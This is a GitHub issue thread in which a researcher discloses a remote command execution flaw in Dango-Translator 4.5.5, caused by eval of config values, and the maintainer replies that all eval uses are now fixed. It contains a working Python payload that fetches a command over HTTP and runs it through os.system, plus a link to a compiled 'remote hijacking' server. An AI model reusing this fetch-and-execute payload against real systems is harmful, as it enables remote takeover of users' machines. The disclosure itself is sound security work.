Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[Warning] Hijacked Remote Command Execute in Dango-Translator Ver4.5.5 #127

Closed
Leeyangee opened this issue Jul 17, 2023 · 1 comment
Closed

[Warning] Hijacked Remote Command Execute in Dango-Translator Ver4.5.5 #127

Leeyangee opened this issue Jul 17, 2023 · 1 comment

Comments

@Leeyangee
Copy link

Leeyangee commented Jul 17, 2023
edited

Vulnerability Product: Dango-Translator Ver4.5.5
Vulnerability version: Ver4.5.5
Vulnerability type: Hijacked Remote Command Execute
Vulnerability Details:
Vulnerability location: app/config/cloud_config.json

withoud check the xxxUse variable in app/config/cloud_config.json and eval it ,unsafe config may causes Hijacked Remote Command Execute
image
image

client payload : "__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"
remote hijacking program : https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe
remote hijacking program original code : https://github.com/Leeyangee/leeya_bug/tree/main/DangoTranslator_payload/testProject

PROVE:

Firstly download a Dango-Translator Ver4.5.5
Run the program to generate config
image

Secondly go to app/config/cloud_config.json, replace value of xxxUse with client payload,
here replace "tencentwebUse": "False" with "tencentwebUse": "__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"
image

Thirdly download remote hijacking program : https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe, and keep the program running
(This is a remote hijacking program, so you can deploy it on server but need to change IP_DOMAIN in original_code and url in client payload and re-compile it)
image

Fourthly run "团子翻译器.exe", after login in, windows pops up a calculator(because remote hijacking program runs "calc" command on the client)
image

Once the client login in, the remote hijacking program could detect it and run command on the client

proved Hijacked Remote Command Execute

REASON:

the client payload is divided into these parts
屏幕截图 2023-07-17 133811

the result of eval(client payload) is it self, because "tencentwebUse" will be evaled before exit
image
image

Harm:

attackers could replace payload in order to let client respond a shell to attackers
so attackers could directly obtain shell and get server permissions

discovered by leeya_bug
@PantsuDango
Copy link
Owner

非常非常感谢您提出这个安全隐患,确实是我的疏忽,没太在意可能被利用。
事实上 eval 函数是一个非常危险的函数,我应该尽可能避免在代码里使用它。
因此我完全采纳了你的意见,修复了代码里所有使用 eval 的地方。

相关修复已推送 commit

再次感谢您!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@PantsuDango @Leeyangee